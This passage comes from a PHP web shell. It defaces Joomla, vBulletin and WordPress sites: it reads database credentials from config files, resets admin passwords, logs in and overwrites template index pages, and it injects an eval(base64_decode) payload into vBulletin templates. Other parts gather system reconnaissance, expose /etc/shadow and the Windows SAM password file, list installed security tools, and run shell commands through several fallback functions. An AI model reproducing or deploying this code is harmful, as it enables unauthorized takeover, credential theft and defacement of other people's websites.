1249 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1250 $buffer = curl_exec($ch);
1251 echo "<tr align =center>";
1252 echo '<td>admin : 123456789</td>';
1253 $pos = strpos($buffer,"com_config");
1254 if($pos === false)
1255 echo("<td>[-] Login Error</td>");
1256 else
1257 echo("<td><font class=txt>[+] Login Success</font></td>");
1258
1259 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1260 $ch = curl_init();
1261 curl_setopt($ch, CURLOPT_URL, $url2);
1262 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1263 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1264 curl_setopt($ch, CURLOPT_HEADER, 0);
1265 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1266 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1267 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1268 $buffer = curl_exec($ch);
1269
1270 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1271
1272 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1273
1274 $ch = curl_init();
1275 curl_setopt($ch, CURLOPT_URL, $url2);
1276 curl_setopt($ch, CURLOPT_POST, 1);
1277 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1278
1279 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1280 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1281 curl_setopt($ch, CURLOPT_HEADER, 0);
1282 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1283 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1284 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1285 $buffer = curl_exec($ch);
1286
1287 $pos = strpos($buffer,'<dd class="message message">');
1288 if($pos === false)
1289 {
1290 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1291 }
1292 else
1293 {
1294 $defcount++;
1295 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1296 }
1297 }
1298 else
1299 {
1300 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1301 $data = mysql_fetch_array($req);
1302 $template_name=$data["template"];
1303
1304 $url2=$site_url."/index.php";
1305 $ch = curl_init();
1306 curl_setopt($ch, CURLOPT_URL, $url2);
1307 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1308 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1309 curl_setopt($ch, CURLOPT_HEADER, 1);
1310 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1311 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1312 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1313 $buffer = curl_exec($ch);
1314
1315 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1316
1317 $url2=$site_url."/index.php";
1318 $ch = curl_init();
1319 curl_setopt($ch, CURLOPT_URL, $url2);
1320 curl_setopt($ch, CURLOPT_POST, 1);
1321 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1322 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1323 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1324 curl_setopt($ch, CURLOPT_HEADER, 0);
1325 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1326 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1327 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1328 $buffer = curl_exec($ch);
1329
1330 $pos = strpos($buffer,"com_config");
1331 echo "<tr align =center>";
1332 echo '<td>admin : 123456789</td>';
1333 if($pos === false)
1334 echo("<td>[-] Login Error</td>");
1335 else
1336 echo("<td><font class=txt>[+] Login Success</font></td>");
1337
1338 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1339 $ch = curl_init();
1340 curl_setopt($ch, CURLOPT_URL, $url2);
1341 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1342 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1343 curl_setopt($ch, CURLOPT_HEADER, 0);
1344 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1345 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1346 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1347 $buffer = curl_exec($ch);
1348
1349 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1350
1351 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1352 $ch = curl_init();
1353 curl_setopt($ch, CURLOPT_URL, $url2);
1354 curl_setopt($ch, CURLOPT_POST, 1);
1355 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1356 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1357 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1358 curl_setopt($ch, CURLOPT_HEADER, 0);
1359 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1360 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1361 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1362 $buffer = curl_exec($ch);
1363
1364 $pos = strpos($buffer,'<dd class="message message fade">');
1365 if($pos === false)
1366 {
1367 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1368 }
1369 else
1370 {
1371 $defcount++;
1372 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1373 }
1374 }
1375 echo "</tr>";
1376 }
1377 function changeindexvb($conf,$index)
1378 {
1379 $dol = '$';
1380
1381 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
1382 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
1383 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
1384 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
1385 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
1386
1387 $con =@ mysql_connect($localhost,$username,$password);
1388 $db =@ mysql_select_db($dbname,$con);
1389 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
1390 $data = mysql_fetch_array($ss);
1391
1392 echo "<tr align=center>";
1393 $index=str_replace('"','\\"',$index);
1394 $attack = "{\${eval(base64_decode(\'";
1395 $attack .= base64_encode("echo \"$index\";");
1396 $attack .= "\'))}}{\${exit()}}</textarea>";
1397 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1398 $result =@ mysql_query($query,$con);
1399 if($result)
1400 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
1401 else
1402 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
1403 echo "<tr>";
1404 }
1405 function changeindexwp($conf,$index)
1406 {
1407 $index = urlencode($index);
1408 $dol = '$';
1409 $username = entre2v2($conf,"define('DB_USER', '","');");
1410 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1411 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1412 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1413 $host = entre2v2($conf,"define('DB_HOST', '","');");
1414 $con =@ mysql_connect($host,$username,$password);
1415 $db =@ mysql_select_db($dbname,$con);
1416 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
1417
1418 if($req1)
1419 {
1420 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1421 $data = mysql_fetch_array($req);
1422 $site_url=$data["option_value"];
1423
1424 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1425 $data = mysql_fetch_array($req);
1426 $template = $data["option_value"];
1427
1428 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1429 $data = mysql_fetch_array($req);
1430 $current_theme = $data["option_value"];
1431
1432 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1433 $url2=$site_url."/wp-login.php";
1434
1435 $ch = curl_init();
1436 curl_setopt($ch, CURLOPT_URL, $url2);
1437 curl_setopt($ch, CURLOPT_POST, 1);
1438 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
1439 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1440 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1441 curl_setopt($ch, CURLOPT_HEADER, 0);
1442 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1443 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1444 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1445 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1446 $buffer = curl_exec($ch);
1447
1448 $pos = strpos($buffer,"action=logout");
1449
1450 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
1451 curl_setopt($ch, CURLOPT_URL, $url2);
1452 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1453 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1454 curl_setopt($ch, CURLOPT_HEADER, 0);
1455 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1456 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1457 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1458 $buffer0 = curl_exec($ch);
1459
1460 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1461 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1462
1463 if(substr_count($_file,"index.php") != 0)
1464 $output .= "<tr align =center>";
1465 $url2=$site_url."/wp-admin/theme-editor.php";
1466 curl_setopt($ch, CURLOPT_URL, $url2);
1467 curl_setopt($ch, CURLOPT_POST, 1);
1468 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1469 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1470 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1471 curl_setopt($ch, CURLOPT_HEADER, 0);
1472 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1473 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1474 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1475 $buffer = curl_exec($ch);
1476 curl_close($ch);
1477 $pos = strpos($buffer,'<div id="message" class="updated">');
1478 $cond = 0;
1479 if($pos === false)
1480 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
1481 else
1482 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
1483 }
1484 else
1485 $output.= "<td colspan=2> DB Error</td>";
1486 echo $output."</tr>";
1487 global $base_path;
1488 unlink($base_path.'COOKIE.txt');
1489 }
1490 function getDisabledFunctions()
1491 {
1492 if(!ini_get('disable_functions'))
1493 {
1494 return "None";
1495 }
1496 else
1497 {
1498 return @ini_get('disable_functions');
1499 }
1500 }
1501 function getFilePermissions($file)
1502 {
1503 $perms = fileperms($file);
1504
1505 if (($perms & 0xC000) == 0xC000) {
1506 // Socket
1507 $info = 's';
1508 } elseif (($perms & 0xA000) == 0xA000) {
1509 // Symbolic Link
1510 $info = 'l';
1511 } elseif (($perms & 0x8000) == 0x8000) {
1512 // Regular
1513 $info = '-';
1514 } elseif (($perms & 0x6000) == 0x6000) {
1515 // Block special
1516 $info = 'b';
1517 } elseif (($perms & 0x4000) == 0x4000) {
1518 // Directory
1519 $info = 'd';
1520 } elseif (($perms & 0x2000) == 0x2000) {
1521 // Character special
1522 $info = 'c';
1523 } elseif (($perms & 0x1000) == 0x1000) {
1524 // FIFO pipe
1525 $info = 'p';
1526 } else {
1527 // Unknown
1528 $info = 'u';
1529 }
1530
1531 // Owner
1532 $info .= (($perms & 0x0100) ? 'r' : '-');
1533 $info .= (($perms & 0x0080) ? 'w' : '-');
1534 $info .= (($perms & 0x0040) ?
1535 (($perms & 0x0800) ? 's' : 'x' ) :
1536 (($perms & 0x0800) ? 'S' : '-'));
1537
1538 // Group
1539 $info .= (($perms & 0x0020) ? 'r' : '-');
1540 $info .= (($perms & 0x0010) ? 'w' : '-');
1541 $info .= (($perms & 0x0008) ?
1542 (($perms & 0x0400) ? 's' : 'x' ) :
1543 (($perms & 0x0400) ? 'S' : '-'));
1544
1545 // World
1546 $info .= (($perms & 0x0004) ? 'r' : '-');
1547 $info .= (($perms & 0x0002) ? 'w' : '-');
1548 $info .= (($perms & 0x0001) ?
1549 (($perms & 0x0200) ? 't' : 'x' ) :
1550 (($perms & 0x0200) ? 'T' : '-'));
1551
1552 return $info;
1553}
1554 function filepermscolor($filename)
1555 {
1556 if(!@is_readable($filename))
1557 return "<font class=readperm>".getFilePermissions($filename)."</font>";
1558 else if(!@is_writable($filename))
1559 return "<font class=noperm>".getFilePermissions($filename)."</font>";
1560 else
1561 return "<font class=wrtperm>".getFilePermissions($filename)."</font>";
1562 }
1563
1564 function yourip()
1565 {
1566 echo $_SERVER["REMOTE_ADDR"];
1567 }
1568 function phpver()
1569 {
1570 $pv=@phpversion();
1571 echo $pv;
1572 }
1573 function magic_quote()
1574 {
1575 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"OFF";
1576 }
1577 function serverip()
1578 {
1579 echo @gethostbyname($_SERVER["HTTP_HOST"]);
1580 }
1581 function serverport()
1582 {
1583 echo $_SERVER['SERVER_PORT'];
1584 }
1585 function safe()
1586 {
1587 global $sm;
1588 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
1589 }
1590 function serveradmin()
1591 {
1592 echo $_SERVER['SERVER_ADMIN'];
1593 }
1594 function systeminfo()
1595 {
1596 echo php_uname();
1597 }
1598 function curlinfo()
1599 {
1600 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("Disabled");
1601 }
1602 function oracleinfo()
1603 {
1604 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("Disabled");
1605 }
1606 function mysqlinfo()
1607 {
1608 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1609 }
1610 function mssqlinfo()
1611 {
1612 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1613 }
1614 function postgresqlinfo()
1615 {
1616 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1617 }
1618 function softwareinfo()
1619 {
1620 echo getenv("SERVER_SOFTWARE");
1621 }
1622 function download()
1623 {
1624 $frd=$_GET['download'];
1625 $prd=explode("/",$frd);
1626 for($i=0;$i<sizeof($prd);$i++)
1627 {
1628 $nfd=$prd[$i];
1629 }
1630 @ob_clean();
1631 header("Content-type: application/octet-stream");
1632 header("Content-length: ".filesize($nfd));
1633 header("Content-disposition: attachment; filename=\"".$nfd."\";");
1634 readfile($nfd);
1635
1636 exit;
1637
1638 }
1639
1640 function HumanReadableFilesize($size)
1641 {
1642 $mod = 1024;
1643 $units = explode(' ','B KB MB GB TB PB');
1644 for ($i = 0; $size > $mod; $i++)
1645 {
1646 $size /= $mod;
1647 }
1648 return round($size, 2) . ' ' . $units[$i];
1649 }
1650
1651 function showDrives()
1652 {
1653 global $self;
1654 foreach(range('A','Z') as $drive)
1655 {
1656 if(is_dir($drive.':\\'))
1657 {
1658 $myd = $drive.":\\";
1659 ?>
1660 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
1661 <?php echo $myd; ?>
1662 </a>
1663 <?php
1664 }
1665 }
1666 }
1667 function diskSpace()
1668 {
1669 global $dir;
1670 return disk_total_space($dir);
1671 }
1672 function freeSpace()
1673 {
1674 global $dir;
1675 return disk_free_space($dir);
1676 }
1677
1678 function thiscmd($p)
1679 {
1680 $path = myexe('which ' . $p);
1681 if(!empty($path))
1682 return $path;
1683 return false;
1684 }
1685
1686 function mysecinfo()
1687 {
1688 function myparam($n, $v)
1689 {
1690 $v = trim($v);
1691 if($v)
1692 {
1693 echo '<span><font size=3>' . $n . ': </font></span>';
1694 if(strpos($v, "\n") === false)
1695 echo '<font class=txt size=3>' . $v . '</font><br>';
1696 else
1697 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1698 }
1699 }
1700
1701 myparam('Server software', @getenv('SERVER_SOFTWARE'));
1702 if(function_exists('apache_get_modules'))
1703 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1704 myparam('Open base dir', @ini_get('open_basedir'));
1705 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1706 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1707 $temp=array();
1708 if(function_exists('mysql_get_client_info'))
1709 $temp[] = "MySql (".mysql_get_client_info().")";
1710 if(function_exists('mssql_connect'))
1711 $temp[] = "MSSQL";
1712 if(function_exists('pg_connect'))
1713 $temp[] = "PostgreSQL";
1714 if(function_exists('oci_connect'))
1715 $temp[] = "Oracle";
1716 myparam('Supported databases', implode(', ', $temp));
1717 echo '<br>';
1718
1719 if($GLOBALS['os'] == 'Linux') {
1720 myparam('Distro : ', myexe("cat /etc/*-release"));
1721 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
1722 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
1723 myparam('OS version', @file_get_contents('/proc/version'));
1724 myparam('Distro name', @file_get_contents('/etc/issue.net'));
1725 myparam('Where is Perl?', myexe('whereis perl'));
1726 myparam('Where is Python?', myexe('whereis python'));
1727 myparam('Where is gcc?', myexe('whereis gcc'));
1728 myparam('Where is apache?', myexe('whereis apache'));
1729 myparam('CPU?', myexe('cat /proc/cpuinfo'));
1730 myparam('RAM', myexe('free -m'));
1731 myparam('Mount options', myexe('cat /etc/fstab'));
1732 myparam('User Limits', myexe('ulimit -a'));
1733
1734
1735 if(!$GLOBALS['safe_mode']) {
1736 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1737 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1738 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1739 echo '<br>';
1740 $temp=array();
1741 foreach ($userful as $item)
1742 if(thiscmd($item))
1743 $temp[] = $item;
1744 myparam('Userful', implode(', ',$temp));
1745 $temp=array();
1746 foreach ($danger as $item)
1747 if(thiscmd($item))
1748 $temp[] = $item;
1749 myparam('Danger', implode(', ',$temp));
1750 $temp=array();
1751 foreach ($downloaders as $item)
1752 if(thiscmd($item))
1753 $temp[] = $item;
1754 myparam('Downloaders', implode(', ',$temp));
1755 echo '<br/>';
1756 myparam('HDD space', myexe('df -h'));
1757 myparam('Hosts', @file_get_contents('/etc/hosts'));
1758
1759 }
1760 } else {
1761 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
1762 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
1763 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
1764 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
1765 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
1766 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
1767 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1768 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
1769 myparam('OS Version',myexe('ver'));
1770 myparam('Account Settings',myexe('net accounts'));
1771 myparam('User Accounts',myexe('net user'));
1772 }
1773 echo '</div>';
1774 }
1775
1776
1777
1778 function myexe($in)
1779 {
1780 $out = '';
1781 if (function_exists('exec')) {
1782 @exec($in,$out);
1783 $out = @join("\n",$out);
1784 } elseif (function_exists('passthru')) {
1785 ob_start();
1786 @passthru($in);
1787 $out = ob_get_clean();
1788 } elseif (function_exists('system')) {
1789 ob_start();
1790 @system($in);
1791 $out = ob_get_clean();
1792 } elseif (function_exists('shell_exec')) {
1793 $out = shell_exec($in);
1794 } elseif (is_resource($f = @popen($in,"r"))) {
1795 $out = "";
1796 while(!@feof($f))
1797 $out .= fread($f,1024);
1798 pclose($f);
1799 }
1800 return $out;
1801}
1802function exec_all($command)
1803 {
1804
1805 $output = '';
1806 if(function_exists('exec'))
1807 {
1808 exec($command,$output);
1809 $output = join("\n",$output);
1810 }
1811
1812 else if(function_exists('shell_exec'))
1813 {
1814 $output = shell_exec($command);
1815 }
1816
1817 else if(function_exists('popen'))
1818 {
1819 $handle = popen($command , "r"); // Open the command pipe for reading
1820 if(is_resource($handle))
1821 {
1822 if(function_exists('fread') && function_exists('feof'))
1823 {
1824 while(!feof($handle))
1825 {
1826 $output .= fread($handle, 512);
1827 }
1828 }
1829 else if(function_exists('fgets') && function_exists('feof'))
1830 {
1831 while(!feof($handle))
1832 {
1833 $output .= fgets($handle,512);
1834 }
1835
1836
1837
1838 }
1839 }
1840 pclose($handle);
1841 }
1842
1843
1844 else if(function_exists('system'))
1845 {
1846 ob_start(); //start output buffering
1847 system($command);
1848 $output = ob_get_contents(); // Get the ouput
1849 ob_end_clean(); // Stop output buffering
1850 }
1851
1852 else if(function_exists('passthru'))
1853 {
1854 ob_start(); //start output buffering
1855 passthru($command);
1856 $output = ob_get_contents(); // Get the ouput
1857 ob_end_clean(); // Stop output buffering
1858 }
1859
1860 else if(function_exists('proc_open'))
1861 {
1862 $descriptorspec = array(
1863 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
1864 );
1865 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1866 if(is_resource($handle))
1867 {
1868 if(function_exists('fread') && function_exists('feof'))
1869 {
1870 while(!feof($pipes[1]))
1871 {
1872 $output .= fread($pipes[1], 512);
1873 }
1874 }
1875 else if(function_exists('fgets') && function_exists('feof'))
1876 {
1877 while(!feof($pipes[1]))
1878 {
1879 $output .= fgets($pipes[1],512);
1880 }
1881 }
1882 }
1883 pclose($handle);
1884 }
1885
1886 return(htmlspecialchars($output));
1887
1888}
1889
1890$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
1891$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1892
1893function getOGid($value)
1894{
1895 if(!function_exists('posix_getegid')) {
1896 $user = @get_current_user();
1897 $uid = @getmyuid();
1898 $gid = @getmygid();
1899 $group = "?";
1900 $owner = $uid . "/". $gid;
1901 return $owner;
1902 } else {
1903 $name=@posix_getpwuid(@fileowner($value));
1904 $group=@posix_getgrgid(@filegroup($value));
1905 $owner = $name['name']. " / ". $group['name'];
1906 return $owner;
1907 }
1908}
1909if(!function_exists("scandir"))
1910{
1911 function scandir($dir) {
1912 $dh = opendir($dir);
1913 while (false !== ($filename = readdir($dh)))
1914 $files[] = $filename;
1915 return $files;
1916 }
1917}
1918function mainfun($dir)
1919{
1920 global $ind, $directorysperator,$os;
1921
1922 $mydir = basename(dirname(__FILE__));
1923 $pdir = str_replace($mydir,"",$dir);
1924 $pdir = str_replace("/","",$dir);
1925
1926 $files = array();
1927 $dirs = array();
1928
1929 $odir=opendir($dir);
1930 while($file = readdir($odir))
1931 {
1932 if(is_dir($dir.'/'.$file))
1933 {
1934 $dirs[]=$file;
1935 }
1936 else
1937 {
1938 $files[]=$file;
1939 }
1940 }
1941 $countfiles = count($dirs) + count($files);
1942 $dircount = count($dirs);
1943 $dircount = $dircount-2;
1944 $myfiles = array_merge($dirs,$files);
1945 $i = 0;
1946 if(is_dir($dir))
1947 {
1948 if(scandir($dir) === false)
1949 echo "<center><font size=3>Directory isn't readable</font></center>";
1950 else
1951 {
1952?><form method="post" id="myform" name="myform">
1953 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
1954 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
1955 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
1956 <tr height:12px;">
1957 <th>Name</th>
1958 <th>Size</th>
1959 <th>Permissions</th>
1960 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
1961 <th>Modification Date</th>
1962 <th>Rename</th>
1963 <th>Download</th>
1964 <th style="width:2%;">Action</th>
1965 </tr>
1966 <?php
1967 foreach($myfiles as $val)
1968 {
1969 $vv = addslashes($dir . $directorysperator . $val);
1970 $i++;
1971 if($val == ".")
1972 {
1973 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
1974 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
1975
1976 <?php if($os != 'Windows')
1977 {
1978 echo "<td align=center><font size=2>";
1979 echo getOGid($dir)."</font></td>";
1980 }
1981 ?>
1982
1983 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1984 <td></td><td></td><td></td></</tr><?php
1985
1986 }
1987 else if($val == "..")
1988 {
1989 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1990 $vv = addslashes($val);
1991 if(empty($vv))
1992 $vv = "/"; ?>
1993 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1994 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1995 <?php if($os != 'Windows')
1996 {
1997 echo "<td align=center><font size=2>";
1998 echo getOGid($val)."</font></td>";
1999
2000 } ?>
2001 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
2002 <td></td><td></td><td></td></tr><?php continue;
2003 }
2004 }
2005 foreach($myfiles as $val)
2006 {
2007 $vv = addslashes($dir . $directorysperator . $val);
2008 $i++;
2009
2010 if(is_dir($vv))
2011 {
2012 if($val == "." || $val == "..")
2013 continue; ?>
2014 <tr class=lines>
2015 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
2016 <td class='info'><font size=2>DIR</font></td>
2017
2018 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2019 <?php if($os != 'Windows')
2020 {
2021 echo "<td align=center><font size=2>";
2022 echo getOGid($val)."</font></td>";
2023 } ?>
2024 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2025 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2026 <td></td>
2027 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2028 </tr></font>
2029 <?php
2030 }
2031 else if(is_file($vv))
2032 {
2033 ?>
2034 <tr class=lines>
2035 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
2036
2037 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
2038
2039 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2040
2041 <?php if($os != 'Windows')
2042 {
2043 echo "<td align=center><font size=2>";
2044 echo getOGid($val)."</font></td>";
2045 } ?>
